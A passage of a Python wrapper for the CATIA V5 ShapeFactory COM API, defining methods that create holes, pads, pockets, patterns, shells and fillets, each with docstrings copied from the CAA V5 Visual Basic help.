:param Reference i_profile_elt:
:return: Groove
:rtype: Groove
"""
return Groove(self.shape_factory.AddNewGrooveFromRef(i_profile_elt.com_object))
def add_new_hole(self, i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHole(Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iSupport
| The support defining the hole reference plane.
| Anchor point is located at the barycenter of the support. The hole
| axis in 3D passes through that point and is normal to the
| plane.
| The following
|
| Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHole(i_support.com_object, i_depth))
def add_new_hole_from_point(self, i_x: float, i_y: float, i_z: float, i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleFromPoint(double iX,
| double iY,
| double iZ,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iX
| Origin point x absolute coordinate
| iY
| Origin point y absolute coordinate
| iZ
| Origin point z absolute coordinate
| Sets the origin point which the hole is anchored
| to.
| If mandatory, the entry point will be projected onto a tangent
| plane.
| iSupport
| The support defining the hole reference plane.
| The following
|
| Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param float i_x:
:param float i_y:
:param float i_z:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleFromPoint(i_x, i_y, i_z, i_support.com_object, i_depth))
def add_new_hole_from_ref_point(self, i_origin: Reference, i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleFromRefPoint(Reference iOrigin,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iOrigin
| The origin point which the hole is anchored to.
| iSupport
| The support defining the hole reference plane.
| The following
|
| Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param Reference i_origin:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleFromRefPoint(i_origin.com_object, i_support.com_object, i_depth))
def add_new_hole_from_sketch(self, i_sketch: Sketch, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleFromSketch(Sketch iSketch,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iSketch
| The sketch defining the hole reference plane and anchor
| point.
| This sketch must contain a single point that defines the hole axis:
| the hole axis in 3D passes through that point and is normal to the sketch
| plane.
| iDepth
| The hole depth.
|
| Returns:
| The created hole
:param Sketch i_sketch:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleFromSketch(i_sketch.com_object, i_depth))
def add_new_hole_with2_constraints(self, i_x: float, i_y: float, i_z: float, i_edge1: Reference, i_edge2: Reference,
i_support: Reference, i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleWith2Constraints(double iX,
| double iY,
| double iZ,
| Reference iEdge1,
| Reference iEdge2,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iX
| Origin point x absolute coordinate
| iY
| Origin point y absolute coordinate
| iZ
| Origin point z absolute coordinate
| Sets the origin point which the hole is anchored
| to.
| If mandatory, the entry point will be projected onto a tangent
| plane.
| iEdge
| The edge which the hole is constrained to.
| The origin of the hole will have a length constraint with each
| edge.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iSupport
| The support defining the hole reference plane.
| The following Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param float i_x:
:param float i_y:
:param float i_z:
:param Reference i_edge1:
:param Reference i_edge2:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleWith2Constraints(i_x, i_y, i_z, i_edge1.com_object, i_edge2.com_object,
i_support.com_object, i_depth))
def add_new_hole_with_constraint(self, i_x: float, i_y: float, i_z: float, i_edge: Reference, i_support: Reference,
i_depth: float) -> Hole:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewHoleWithConstraint(double iX,
| double iY,
| double iZ,
| Reference iEdge,
| Reference iSupport,
| double iDepth) As Hole
|
| Creates and returns a new hole within the current shape.
| Actual hole shape is defined by editing hole properties after its
| creation.
|
| Parameters:
|
| iX
| Origin point x absolute coordinate
| iY
| Origin point y absolute coordinate
| iZ
| Origin point z absolute coordinate
| Sets the origin point which the hole is anchored
| to.
| If mandatory, the entry point will be projected onto a tangent
| plane.
| iEdge
| The edge which the hole is constrained to.
| If edge is circular, the origin of the hole will be concentric to
| the edge (iX, iY, iZ will be overridden). if not, the origin of the hole will
| have a length constraint with the edge.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iSupport
| The support defining the hole reference plane.
| The following Boundary object is supported: Face.
| iDepth
| The hole depth.
| Returns:
| The created hole
:param float i_x:
:param float i_y:
:param float i_z:
:param Reference i_edge:
:param Reference i_support:
:param float i_depth:
:return: Hole
:rtype: Hole
"""
return Hole(self.shape_factory.AddNewHoleWithConstraint(i_x, i_y, i_z, i_edge.com_object, i_support.com_object,
i_depth))
def add_new_intersect(self, i_body_to_intersect: Body) -> Intersect:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewIntersect(Body iBodyToIntersect) As Intersect
|
| Creates and returns a new intersect operation within the current
| body.
|
| Parameters:
|
| iBodyToIntersect
| The body to intersect with the current body
|
| Returns:
| The created intersect operation
:param Body i_body_to_intersect:
:return: Intersect
:rtype: Intersect
"""
return Intersect(self.shape_factory.AddNewIntersect(i_body_to_intersect.com_object))
def add_new_loft(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewLoft() As AnyObject
|
| Creates and returns a new Loft feature.
|
| Returns:
| The created Loft feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewLoft())
def add_new_mirror(self, i_mirroring_element: Reference) -> Mirror:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewMirror(Reference iMirroringElement) As Mirror
|
| Creates and returns a new mirror within the current body.
| A mirror allows for transforming existing shapes by a symmetry with respect
| to an existing plane.
|
| Parameters:
|
| iMirroringElement
| The plane used by the mirror as the symmetry
| plane.
| The following
|
| Boundary object is supported: PlanarFace.
| Returns:
| The created mirror
:param Reference i_mirroring_element:
:return: Mirror
:rtype: Mirror
"""
return Mirror(self.shape_factory.AddNewMirror(i_mirroring_element.com_object))
def add_new_pad(self, i_sketch: Sketch, i_height: float) -> Pad:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPad(Sketch iSketch,
| double iHeight) As Pad
|
| Creates and returns a new pad within the current body.
|
| Parameters:
|
| iSketch
| The sketch defining the pad base
| iHeight
| The pad height
|
| Returns:
| The created pad
:param Sketch i_sketch:
:param float i_height:
:return: Pad
:rtype: Pad
"""
return Pad(self.shape_factory.AddNewPad(i_sketch.com_object, i_height))
def add_new_pad_from_ref(self, i_profile_elt: Reference, i_height: float) -> Pad:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPadFromRef(Reference iProfileElt,
| double iHeight) As Pad
|
| Creates and returns a new pad within the current body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the pad base
|
| iHeight
| The pad height
|
| Returns:
| The created pad
:param Reference i_profile_elt:
:param float i_height:
:return: Pad
:rtype: Pad
"""
return Pad(self.shape_factory.AddNewPadFromRef(i_profile_elt.com_object, i_height))
def add_new_pocket(self, i_sketch: Sketch, i_height: float) -> Pocket:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPocket(Sketch iSketch,
| double iHeight) As Pocket
|
| Creates and returns a new pocket within the current shape.
|
| Parameters:
|
| iSketch
| The sketch defining the pocket base
| iDepth
| The pocket depth
|
| Returns:
| The created pocket
:param Sketch i_sketch:
:param float i_height:
:return: Pocket
:rtype: Pocket
"""
return Pocket(self.shape_factory.AddNewPocket(i_sketch.com_object, i_height))
def add_new_pocket_from_ref(self, i_profile_elt: Reference, i_height: float) -> Pocket:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewPocketFromRef(Reference iProfileElt,
| double iHeight) As Pocket
|
| Creates and returns a new pocket within the current shape.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the pocket base
|
| iDepth
| The pocket depth
|
| Returns:
| The created pocket
:param Reference i_profile_elt:
:param float i_height:
:return: Pocket
:rtype: Pocket
"""
return Pocket(self.shape_factory.AddNewPocketFromRef(i_profile_elt.com_object, i_height))
def add_new_rect_pattern(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int, i_nb_of_copies_in_dir2: int,
i_step_in_dir1: float, i_step_in_dir2: float, i_shape_to_copy_position_along_dir1: int,
i_shape_to_copy_position_along_dir2: int, i_dir1: Reference, i_dir2: Reference,
i_is_reversed_dir1: bool, i_is_reversed_dir2: bool,
i_rotation_angle: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRectPattern(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle) As RectPattern
|
| Creates and returns a new rectangular pattern within the current
| body.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the rectangular pattern
| iNbOfCopiesInDir1
| The number of times iShapeToCopy will be copied along the pattern
| first direction
| iNbOfCopiesInDir2
| The number of times iShapeToCopy will be copied along the pattern
| second direction
| iStepInDir1
| The distance that will separate two consecutive copies in the
| pattern along its first direction
| iStepInDir2
| The distance that will separate two consecutive copies in the
| pattern along its second direction
| iShapeToCopyPositionAlongDir1
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir1
| iShapeToCopyPositionAlongDir2
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir2
| iDir1
| The line or linear edge that specifies the pattern first
| repartition direction
| The following
|
| Boundary objects are supported: PlanarFace, RectilinearTriDimFeatEdge,
| RectilinearBiDimFeatEdge.
| iDir2
| The line or linear edge that specifies the pattern second repartition
| direction
| The following Boundary objects are supported: PlanarFace,
| RectilinearTriDimFeatEdge, RectilinearBiDimFeatEdge.
| iIsReversedDir1
| The boolean flag indicating whether the natural orientation of iDir1
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir1.
|
| iIsReversedDir2
| The boolean flag indicating whether the natural orientation of iDir2
| should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir2.
|
| iRotationAngle
| The angle applied to both directions iDir1 and iDir2 prior to applying
| the pattern. The original shape iShapeToCopy is used as the rotation center.
| Nevertheless, the copied shapes themselves are not rotated. This allows the
| definition of a rectangular pattern relatively to existing geometry, but not
| necessarily parallel to it.
| Returns:
| The created rectangular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(self.shape_factory.AddNewRectPattern(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1, i_step_in_dir2,
i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2, i_dir1.com_object,
i_dir2.com_object, i_is_reversed_dir1,
i_is_reversed_dir2, i_rotation_angle))
def add_new_rect_patternof_list(self, i_shape_to_copy: AnyObject, i_nb_of_copies_in_dir1: int,
i_nb_of_copies_in_dir2: int, i_step_in_dir1: float, i_step_in_dir2: float,
i_shape_to_copy_position_along_dir1: int, i_shape_to_copy_position_along_dir2: int,
i_dir1: Reference, i_dir2: Reference, i_is_reversed_dir1: bool,
i_is_reversed_dir2: bool, i_rotation_angle: float) -> RectPattern:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRectPatternofList(AnyObject iShapeToCopy,
| long iNbOfCopiesInDir1,
| long iNbOfCopiesInDir2,
| double iStepInDir1,
| double iStepInDir2,
| long iShapeToCopyPositionAlongDir1,
| long iShapeToCopyPositionAlongDir2,
| Reference iDir1,
| Reference iDir2,
| boolean iIsReversedDir1,
| boolean iIsReversedDir2,
| double iRotationAngle) As RectPattern
|
| V5R8 Only: Creates and returns a new rectangular pattern within the current
| body using a list of shapes.
|
| Parameters:
|
| iShapeToCopy
| The shape to be copied by the rectangular pattern Others shapes
| will be add by put_ItemToCopy with CATIAPattern interface
|
| iNbOfCopiesInDir1
| The number of times iShapeToCopy will be copied along the pattern
| first direction
| iNbOfCopiesInDir2
| The number of times iShapeToCopy will be copied along the pattern
| second direction
| iStepInDir1
| The distance that will separate two consecutive copies in the
| pattern along its first direction
| iStepInDir2
| The distance that will separate two consecutive copies in the
| pattern along its second direction
| iShapeToCopyPositionAlongDir1
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir1
| iShapeToCopyPositionAlongDir2
| Specifies the position of the original shape iShapeToCopy among its
| copies along iDir2
| iDir1
| The line or linear edge that specifies the pattern first
| repartition direction
| iDir2
| The line or linear edge that specifies the pattern second
| repartition direction
| iIsReversedDir1
| The boolean flag indicating whether the natural orientation of
| iDir1 should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir1.
|
| iIsReversedDir2
| The boolean flag indicating whether the natural orientation of
| iDir2 should be used to orient the pattern operation. True indicates that
| iShapeToCopy is copied in the direction of the natural orientation of iDir2.
|
| iRotationAngle
| The angle applied to both directions iDir1 and iDir2 prior to
| applying the pattern. The original shape iShapeToCopy is used as the rotation
| center. Nevertheless, the copied shapes themselves are not rotated. This allows
| the definition of a rectangular pattern relatively to existing geometry, but
| not necessarily parallel to it.
|
| Returns:
| The created rectangular pattern
:param AnyObject i_shape_to_copy:
:param int i_nb_of_copies_in_dir1:
:param int i_nb_of_copies_in_dir2:
:param float i_step_in_dir1:
:param float i_step_in_dir2:
:param int i_shape_to_copy_position_along_dir1:
:param int i_shape_to_copy_position_along_dir2:
:param Reference i_dir1:
:param Reference i_dir2:
:param bool i_is_reversed_dir1:
:param bool i_is_reversed_dir2:
:param float i_rotation_angle:
:return: RectPattern
:rtype: RectPattern
"""
return RectPattern(
self.shape_factory.AddNewRectPatternofList(i_shape_to_copy.com_object, i_nb_of_copies_in_dir1,
i_nb_of_copies_in_dir2, i_step_in_dir1, i_step_in_dir2,
i_shape_to_copy_position_along_dir1,
i_shape_to_copy_position_along_dir2, i_dir1.com_object,
i_dir2.com_object, i_is_reversed_dir1, i_is_reversed_dir2,
i_rotation_angle))
def add_new_remove(self, i_body_to_remove: Body) -> Remove:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemove(Body iBodyToRemove) As Remove
|
| Creates and returns a new remove operation within the current
| body.
|
| Parameters:
|
| iBodyToRemove
| The body to remove from the current body
|
| Returns:
| The created remove operation
:param Body i_body_to_remove:
:return: Remove
:rtype: Remove
"""
return Remove(self.shape_factory.AddNewRemove(i_body_to_remove.com_object))
def add_new_remove_face(self, i_keep_faces: Reference, i_remove_faces: Reference) -> RemoveFace:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemoveFace(Reference iKeepFaces,
| Reference iRemoveFaces) As RemoveFace
|
| Creates and returns a new RemoveFace feature.
|
| Parameters:
|
| iKeepFaces
| The reference of the face to Keep.
| iRemoveFaces
| The reference of the face to Remove.
|
| Returns:
| The created RemoveFace feature.
:param Reference i_keep_faces:
:param Reference i_remove_faces:
:return: RemoveFace
:rtype: RemoveFace
"""
return RemoveFace(self.shape_factory.AddNewRemoveFace(i_keep_faces.com_object, i_remove_faces.com_object))
def add_new_removed_blend(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemovedBlend() As AnyObject
|
| Creates and returns a new Removed Blend feature.
|
| Returns:
| The created Removed Blend feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewRemovedBlend())
def add_new_removed_loft(self) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRemovedLoft() As AnyObject
|
| Creates and returns a new Removed Loft feature.
|
| Returns:
| The created Removed Loft feature
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.shape_factory.AddNewRemovedLoft())
def add_new_replace_face(self, i_split_plane: Reference, i_remove_face: Reference,
i_splitting_side: int) -> ReplaceFace:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewReplaceFace(Reference iSplitPlane,
| Reference iRemoveFace,
| CatSplitSide iSplittingSide) As ReplaceFace
|
| Creates and returns a new Align/ ReplaceFace feature.
|
| Parameters:
|
| iSplitPlane
| The reference of the element defining the Splitting Plane.
|
| iRemoveFace
| The reference of the Face to Remove.
| iSplittingSide
| The specification for which side of the current body should be
| Align
|
| Returns:
| The created Align/ ReplaceFace feature.
:param Reference i_split_plane:
:param Reference i_remove_face:
:param int i_splitting_side:
:return: ReplaceFace
:rtype: ReplaceFace
"""
return ReplaceFace(
self.shape_factory.AddNewReplaceFace(i_split_plane.com_object, i_remove_face.com_object, i_splitting_side))
def add_new_rib(self, i_sketch: Sketch, i_center_curve: Sketch) -> Rib:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRib(Sketch iSketch,
| Sketch iCenterCurve) As Rib
|
| Creates and returns a new rib within the current body.
|
| Parameters:
|
| iSketch
| The sketch defining the rib section
| iCenterCurve
| The sketched curve that defines the rib center curve. It must cross
| the section definition sketch iSketch within the inner part of its contour.
|
|
| Returns:
| The created rib
:param Sketch i_sketch:
:param Sketch i_center_curve:
:return: Rib
:rtype: Rib
"""
return Rib(self.shape_factory.AddNewRib(i_sketch.com_object, i_center_curve.com_object))
def add_new_rib_from_ref(self, i_profile: Reference, i_center_curve: Reference) -> Rib:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewRibFromRef(Reference iProfile,
| Reference iCenterCurve) As Rib
|
| Creates and returns a new rib within the current body.
|
| Parameters:
|
| iProfile
| The Profile defining the rib section
| iCenterCurve
| The curve that defines the rib center curve.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| Returns:
| The created rib
:param Reference i_profile:
:param Reference i_center_curve:
:return: Rib
:rtype: Rib
"""
return Rib(self.shape_factory.AddNewRibFromRef(i_profile.com_object, i_center_curve.com_object))
def add_new_scaling(self, i_scaling_reference: Reference, i_factor: float) -> Scaling:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewScaling(Reference iScalingReference,
| double iFactor) As Scaling
|
| Creates and returns a new scaling within the current body.
|
| Parameters:
|
| iScalingReference
| The point, plane or face of the current body that will remain fixed
| during the scaling process: even if the face itself shrinks or expands during
| the scaling, its supporting plane will remain unchanged after the
| scaling.
| The following
|
| Boundary objects are supported: PlanarFace and Vertex.
|
| iFactor
| The scaling factor
| Returns:
| The created scaling
:param Reference i_scaling_reference:
:param float i_factor:
:return: Scaling
:rtype: Scaling
"""
return Scaling(self.shape_factory.AddNewScaling(i_scaling_reference.com_object, i_factor))
def add_new_sew_surface(self, i_sewing_element: Reference, i_sewing_side: int) -> SewSurface:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSewSurface(Reference iSewingElement,
| CatSplitSide iSewingSide) As SewSurface
|
| Creates and returns a new sewing operation within the current
| body.
|
| Parameters:
|
| iSewingElement
| The face or skin or surface that will be sewn on the current body
|
| iSewingSide
| The specification for which side of the current body should be kept
| at the end of the sewing operation
|
| Returns:
| The created sewing operation
:param Reference i_sewing_element:
:param int i_sewing_side:
:return: SewSurface
:rtype: SewSurface
"""
return SewSurface(self.shape_factory.AddNewSewSurface(i_sewing_element.com_object, i_sewing_side))
def add_new_shaft(self, i_sketch: Sketch) -> Shaft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewShaft(Sketch iSketch) As Shaft
|
| Creates and returns a new shaft within the current body.
| The Revolution, as a supertype for shafts, provides starting and ending
| angles for the shaft definition.
|
| Parameters:
|
| iSketch
| The sketch defining the shaft section.
|
| If the shaft applies to the current body, then the sketch must
| contain a contour and an axis that will be used to rotate the contour in the
| space, thus defining the shaft.
| If the shaft is the first shape defined, there is not current
| body to apply to. In such a case, the sketch must contain a curve whose end
| points are linked by an axis. By rotating the curve in the space around the
| axis, the shaft operation will define a revolution shape. This also works if
| the sketch contains a closed contour and an axis outside of this contour: in
| that case a revolution shape will be created, for example a torus.
|
|
| Returns:
| The created shaft
:param Sketch i_sketch:
:return: Shaft
:rtype: Shaft
"""
return Shaft(self.shape_factory.AddNewShaft(i_sketch.com_object))
def add_new_shaft_from_ref(self, i_profile_elt: Reference) -> Shaft:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewShaftFromRef(Reference iProfileElt) As Shaft
|
| Creates and returns a new shaft within the current body.
|
| Parameters:
|
| iProfileElt
| The reference on the element defining the shaft base
|
|
| Returns:
| The created shaft
:param Reference i_profile_elt:
:return: Shaft
:rtype: Shaft
"""
return Shaft(self.shape_factory.AddNewShaftFromRef(i_profile_elt.com_object))
def add_new_shell(self, i_face_to_remove: Reference, i_internal_thickness: float,
i_external_thickness: float) -> Shell:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewShell(Reference iFaceToRemove,
| double iInternalThickness,
| double iExternalThickness) As Shell
|
| Creates and returns a new shell within the current body.
|
| Parameters:
|
| iFaceToRemove
| The first face to be removed in the shell process.
| The following
|
| Boundary object is supported: Face.
| iInternalThickness
| The thickness of material to be added on the internal side of all the
| faces during the shell process, except for those to be removed
|
| iExternaThickness
| The thickness of material to be added on the external side of all the
| faces during the shell process, except for those to be removed
|
| Returns:
| The created shell
:param Reference i_face_to_remove:
:param float i_internal_thickness:
:param float i_external_thickness:
:return: Shell
:rtype: Shell
"""
return Shell(
self.shape_factory.AddNewShell(i_face_to_remove.com_object, i_internal_thickness, i_external_thickness))
def add_new_slot(self, i_sketch: Sketch, i_center_curve: Sketch) -> Slot:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSlot(Sketch iSketch,
| Sketch iCenterCurve) As Slot
|
| Creates and returns a new slot within the current shape.
|
| Parameters:
|
| iSketch
| The sketch defining the slot section
| iCenterCurve
| The sketched curve that defines the slot center curve. It must
| cross the section definition sketch iSketch within the inner part of its
| contour.
|
| Returns:
| The created slot
:param Sketch i_sketch:
:param Sketch i_center_curve:
:return: Slot
:rtype: Slot
"""
return Slot(self.shape_factory.AddNewSlot(i_sketch.com_object, i_center_curve.com_object))
def add_new_slot_from_ref(self, i_profile: Reference, i_center_curve: Reference) -> Slot:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSlotFromRef(Reference iProfile,
| Reference iCenterCurve) As Slot
|
| Creates and returns a new slot within the current shape.
|
| Parameters:
|
| iProfile
| The sketch defining the slot section
| iCenterCurve
| The curve that defines the slot center curve.
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| Returns:
| The created slot
:param Reference i_profile:
:param Reference i_center_curve:
:return: Slot
:rtype: Slot
"""
return Slot(self.shape_factory.AddNewSlotFromRef(i_profile.com_object, i_center_curve.com_object))
def add_new_solid_combine(self, i_profile_elt_first: Reference, i_profile_elt_second: Reference) -> SolidCombine:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidCombine(Reference iProfileEltFirst,
| Reference iProfileEltSecond) As SolidCombine
|
| Creates and returns a new SolidCombine feature.
|
| Parameters:
|
| iProfileEltFirst
| The reference of the element defining the profile for first
| component.
| iProfileEltSecond
| The reference of the element defining the profile for second
| component.
|
| Returns:
| The created SolidCombine feature.
:param Reference i_profile_elt_first:
:param Reference i_profile_elt_second:
:return: SolidCombine
:rtype: SolidCombine
"""
return SolidCombine(
self.shape_factory.AddNewSolidCombine(i_profile_elt_first.com_object, i_profile_elt_second.com_object))
def add_new_solid_edge_fillet_with_constant_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_radius: float) -> ConstRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidEdgeFilletWithConstantRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| double iRadius) As ConstRadEdgeFillet
|
| Creates and returns a new solid edge fillet with a constant radius. within
| the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iRadius
| The fillet radius
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param float i_radius:
:return: ConstRadEdgeFillet
:rtype: ConstRadEdgeFillet
"""
return ConstRadEdgeFillet(
self.shape_factory.AddNewSolidEdgeFilletWithConstantRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_radius))
def add_new_solid_edge_fillet_with_varying_radius(self, i_edge_to_fillet: Reference, i_propag_mode: int,
i_variation_mode: int,
i_default_radius: float) -> VarRadEdgeFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidEdgeFilletWithVaryingRadius(Reference
| iEdgeToFillet,
| CatFilletEdgePropagation iPropagMode,
| CatFilletVariation iVariationMode,
| double iDefaultRadius) As VarRadEdgeFillet
|
| Creates and returns a new solid edge fillet with a varying radius. within
| the current body.
|
| Parameters:
|
| iEdgeToFillet
| The edge that will be filleted first
| The following
|
| Boundary object is supported: TriDimFeatEdge.
| iPropagMode
| Controls whether other edges found adjacent to the first one should
| also be filleted in the same operation
| iVariationMode
| Controls the law of evolution for the fillet radius between specified
| control points, such as edges extremities
| iDefaultRadius
| The fillet default radius, that will apply when no other radius can be
| inferred from the iVariationMode parameter
| Returns:
| The created edge fillet
:param Reference i_edge_to_fillet:
:param int i_propag_mode:
:param int i_variation_mode:
:param float i_default_radius:
:return: VarRadEdgeFillet
:rtype: VarRadEdgeFillet
"""
return VarRadEdgeFillet(
self.shape_factory.AddNewSolidEdgeFilletWithVaryingRadius(i_edge_to_fillet.com_object, i_propag_mode,
i_variation_mode, i_default_radius))
def add_new_solid_face_fillet(self, i_f1: Reference, i_f2: Reference, i_radius: float) -> FaceFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidFaceFillet(Reference iF1,
| Reference iF2,
| double iRadius) As FaceFillet
|
| Creates and returns a new solid face-to-face fillet.
| Use this method to created face-to-face fillets with varying fillet radii,
| by editing fillet attributes driving its radius after its
| creation.
|
| Parameters:
|
| iF1
| The first face that will support the fillet
| The following
|
| Boundary object is supported: Face.
| iF2
| The second face that will support the fillet
| The following Boundary object is supported: Face.
| iRadius
| The fillet radius
| Returns:
| The created face-to-face fillet
:param Reference i_f1:
:param Reference i_f2:
:param float i_radius:
:return: FaceFillet
:rtype: FaceFillet
"""
return FaceFillet(self.shape_factory.AddNewSolidFaceFillet(i_f1.com_object, i_f2.com_object, i_radius))
def add_new_solid_tritangent_fillet(self, i_f1: Reference, i_f2: Reference,
i_removed_face: Reference) -> TritangentFillet:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func AddNewSolidTritangentFillet(Reference iF1,
| Reference iF2,
| Reference iRemovedFace) As TritangentFillet
|
| Creates and returns a new solid tritangent fillet within the current
| body.
